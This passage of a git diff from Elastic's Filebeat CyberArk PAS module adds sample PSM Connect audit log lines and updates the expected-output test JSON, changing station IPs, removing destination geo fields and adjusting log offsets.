+<5>1 2021-03-15T14:08:06Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 15 07:08:06</Timestamp>\n    <IsoTimestamp>2021-03-15T14:08:06Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>300</MessageID>\n    <Desc>PSM Connect</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>PSM Connect</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PSM</Safe>\n    <File>Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian</File>\n    <Station>81.2.69.143</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=f5725611-ca57-4a2a-a089-f45b3174a358;SrcHost=67.43.156.14;User=adrian;</ExtraDetails>\n    <Message>PSM Connect</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"adrian\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 07:08:06","IsoTimestamp":"2021-03-15T14:08:06Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"81.2.69.143","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=f5725611-ca57-4a2a-a089-f45b3174a358;SrcHost=67.43.156.14;User=adrian;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
+<5>1 2021-03-15T14:08:28Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 15 07:08:28</Timestamp>\n    <IsoTimestamp>2021-03-15T14:08:28Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>300</MessageID>\n    <Desc>PSM Connect</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>PSM Connect</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-UnixSSH-34.123.103.115-testark</File>\n    <Station>81.2.69.143</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=7db90436-8a1a-4203-9a96-65137625ab2d;SrcHost=67.43.156.14;User=testark;</ExtraDetails>\n    <Message>PSM Connect</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSH\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"testark\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"failure\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"0\"></CAProperty>\n      <CAProperty Name=\"LastFailDate\" Value=\"1615814025\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"></CAProperty>\n      <CAProperty Name=\"CPMErrorDetails\" Value=\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n      <CAProperty Name=\"UseSudoOnReconcile\" Value=\"Yes\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 07:08:28","IsoTimestamp":"2021-03-15T14:08:28Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"81.2.69.143","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=7db90436-8a1a-4203-9a96-65137625ab2d;SrcHost=67.43.156.14;User=testark;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615814025"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"UseSudoOnReconcile","Value":"Yes"}]}}}}
+<5>1 2021-03-15T14:11:09Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 15 07:11:09</Timestamp>\n    <IsoTimestamp>2021-03-15T14:11:09Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>300</MessageID>\n    <Desc>PSM Connect</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>PSM Connect</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-UnixSSH-34.123.103.115-testark</File>\n    <Station>81.2.69.143</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=67.43.156.14;User=testark;</ExtraDetails>\n    <Message>PSM Connect</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSH\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"testark\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"failure\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"0\"></CAProperty>\n      <CAProperty Name=\"LastFailDate\" Value=\"1615814025\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"></CAProperty>\n      <CAProperty Name=\"CPMErrorDetails\" Value=\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n      <CAProperty Name=\"UseSudoOnReconcile\" Value=\"Yes\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 07:11:09","IsoTimestamp":"2021-03-15T14:11:09Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"81.2.69.143","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=67.43.156.14;User=testark;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615814025"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"UseSudoOnReconcile","Value":"Yes"}]}}}}
+<5>1 2021-03-16T10:04:51Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 16 03:04:51</Timestamp>\n    <IsoTimestamp>2021-03-16T10:04:51Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>300</MessageID>\n    <Desc>PSM Connect</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>PSM Connect</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-UnixSSH-34.123.103.115-testark</File>\n    <Station>81.2.69.143</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=8b222ac9-c2ad-49ea-9c4e-6829940f58d4;SrcHost=67.43.156.14;User=testark;</ExtraDetails>\n    <Message>PSM Connect</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSH\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"testark\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"failure\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"4\"></CAProperty>\n      <CAProperty Name=\"LastFailDate\" Value=\"1615888216\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"></CAProperty>\n      <CAProperty Name=\"CPMErrorDetails\" Value=\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n      <CAProperty Name=\"UseSudoOnReconcile\" Value=\"Yes\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 16 03:04:51","IsoTimestamp":"2021-03-16T10:04:51Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"81.2.69.143","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=8b222ac9-c2ad-49ea-9c4e-6829940f58d4;SrcHost=67.43.156.14;User=testark;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"4"},{"Name":"LastFailDate","Value":"1615888216"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"UseSudoOnReconcile","Value":"Yes"}]}}}}
diff --git a/x-pack/filebeat/module/cyberarkpas/audit/test/300_psm_connect.log-expected.json b/x-pack/filebeat/module/cyberarkpas/audit/test/300_psm_connect.log-expected.json
index ccb0ea7ec482..562092b46757 100644
--- a/x-pack/filebeat/module/cyberarkpas/audit/test/300_psm_connect.log-expected.json
+++ b/x-pack/filebeat/module/cyberarkpas/audit/test/300_psm_connect.log-expected.json
@@ -91,18 +91,13 @@
         "cyberarkpas.audit.iso_timestamp": "2021-03-11T17:38:20Z",
         "cyberarkpas.audit.issuer": "Administrator",
         "cyberarkpas.audit.message": "PSM Connect",
-        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 09:38:20</Timestamp>\n    <IsoTimestamp>2021-03-11T17:38:20Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>300</MessageID>\n    <Desc>PSM Connect</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>PSM Connect</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PSM</Safe>\n    <File>Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian</File>\n    <Station>81.32.170.205</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=87012dcc-8290-11eb-949e-080027efd402;SrcHost=127.0.0.1;User=adrian;</ExtraDetails>\n    <Message>PSM Connect</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"adrian\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>",
+        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 09:38:20</Timestamp>\n    <IsoTimestamp>2021-03-11T17:38:20Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>300</MessageID>\n    <Desc>PSM Connect</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>PSM Connect</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PSM</Safe>\n    <File>Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian</File>\n    <Station>67.43.156.14</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=87012dcc-8290-11eb-949e-080027efd402;SrcHost=127.0.0.1;User=adrian;</ExtraDetails>\n    <Message>PSM Connect</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"adrian\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>",
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.safe": "PSM",
         "cyberarkpas.audit.severity": "Info",
-        "cyberarkpas.audit.station": "81.32.170.205",
+        "cyberarkpas.audit.station": "67.43.156.14",
         "cyberarkpas.audit.timestamp": "Mar 11 09:38:20",
         "destination.address": "34.123.103.115",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "34.123.103.115",
         "destination.user.name": "adrian",
         "event.action": "psm connect",
@@ -134,7 +129,7 @@
         "related.ip": [
             "127.0.0.1",
             "34.123.103.115",
-            "81.32.170.205"
+            "67.43.156.14"
         ],
         "related.user": [
             "Administrator",
@@ -171,18 +166,13 @@
         "cyberarkpas.audit.iso_timestamp": "2021-03-11T17:46:56Z",
         "cyberarkpas.audit.issuer": "Administrator",
         "cyberarkpas.audit.message": "PSM Connect",
-        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 09:46:56</Timestamp>\n    <IsoTimestamp>2021-03-11T17:46:56Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>300</MessageID>\n    <Desc>PSM Connect</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>PSM Connect</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PSM</Safe>\n    <File>Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian</File>\n    <Station>81.32.170.205</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=ba22b012-8291-11eb-b981-080027efd402;SrcHost=127.0.0.1;User=adrian;</ExtraDetails>\n    <Message>PSM Connect</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"adrian\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>",
+        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 09:46:56</Timestamp>\n    <IsoTimestamp>2021-03-11T17:46:56Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>300</MessageID>\n    <Desc>PSM Connect</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>PSM Connect</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PSM</Safe>\n    <File>Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian</File>\n    <Station>67.43.156.14</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=ba22b012-8291-11eb-b981-080027efd402;SrcHost=127.0.0.1;User=adrian;</ExtraDetails>\n    <Message>PSM Connect</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"adrian\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>",
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.safe": "PSM",
         "cyberarkpas.audit.severity": "Info",
-        "cyberarkpas.audit.station": "81.32.170.205",
+        "cyberarkpas.audit.station": "67.43.156.14",
         "cyberarkpas.audit.timestamp": "Mar 11 09:46:56",
         "destination.address": "34.123.103.115",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "34.123.103.115",
         "destination.user.name": "adrian",
         "event.action": "psm connect",
@@ -203,7 +193,7 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 5086,
+        "log.offset": 5084,
         "log.syslog.priority": "5",
         "network.application": "ssh",
         "network.direction": "outbound",
@@ -214,7 +204,7 @@
         "related.ip": [
             "127.0.0.1",
             "34.123.103.115",
-            "81.32.170.205"
+            "67.43.156.14"
         ],
         "related.user": [
             "Administrator",
@@ -251,18 +241,13 @@
         "cyberarkpas.audit.iso_timestamp": "2021-03-11T17:48:34Z",
         "cyberarkpas.audit.issuer": "Administrator",
         "cyberarkpas.audit.message": "PSM Connect",
-        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 09:48:34</Timestamp>\n    <IsoTimestamp>2021-03-11T17:48:34Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>300</MessageID>\n    <Desc>PSM Connect</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>PSM Connect</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PSM</Safe>\n    <File>Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian</File>\n    <Station>81.32.170.205</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=f6acbf00-8291-11eb-b9ba-080027efd402;SrcHost=10.0.2.2;User=adrian;</ExtraDetails>\n    <Message>PSM Connect</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"adrian\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>",
+        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 09:48:34</Timestamp>\n    <IsoTimestamp>2021-03-11T17:48:34Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>300</MessageID>\n    <Desc>PSM Connect</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>PSM Connect</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PSM</Safe>\n    <File>Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian</File>\n    <Station>67.43.156.14</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=f6acbf00-8291-11eb-b9ba-080027efd402;SrcHost=10.0.2.2;User=adrian;</ExtraDetails>\n    <Message>PSM Connect</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"adrian\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>",
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.safe": "PSM",
         "cyberarkpas.audit.severity": "Info",
-        "cyberarkpas.audit.station": "81.32.170.205",
+        "cyberarkpas.audit.station": "67.43.156.14",
         "cyberarkpas.audit.timestamp": "Mar 11 09:48:34",
         "destination.address": "34.123.103.115",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "34.123.103.115",
         "destination.user.name": "adrian",
         "event.action": "psm connect",
@@ -283,7 +268,7 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 7606,
+        "log.offset": 7602,
         "log.syslog.priority": "5",
         "network.application": "ssh",
         "network.direction": "outbound",
@@ -294,7 +279,7 @@
         "related.ip": [
             "10.0.2.2",
             "34.123.103.115",
-            "81.32.170.205"
+            "67.43.156.14"
         ],
         "related.user": [
             "Administrator",
@@ -331,18 +316,13 @@
         "cyberarkpas.audit.iso_timestamp": "2021-03-11T17:54:56Z",
         "cyberarkpas.audit.issuer": "Administrator",
         "cyberarkpas.audit.message": "PSM Connect",
-        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 09:54:56</Timestamp>\n    <IsoTimestamp>2021-03-11T17:54:56Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>300</MessageID>\n    <Desc>PSM Connect</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>PSM Connect</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PSM</Safe>\n    <File>Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian</File>\n    <Station>81.32.170.205</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=d8ff4d32-8292-11eb-b962-080027efd402;SrcHost=10.0.2.2;User=adrian;</ExtraDetails>\n    <Message>PSM Connect</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" 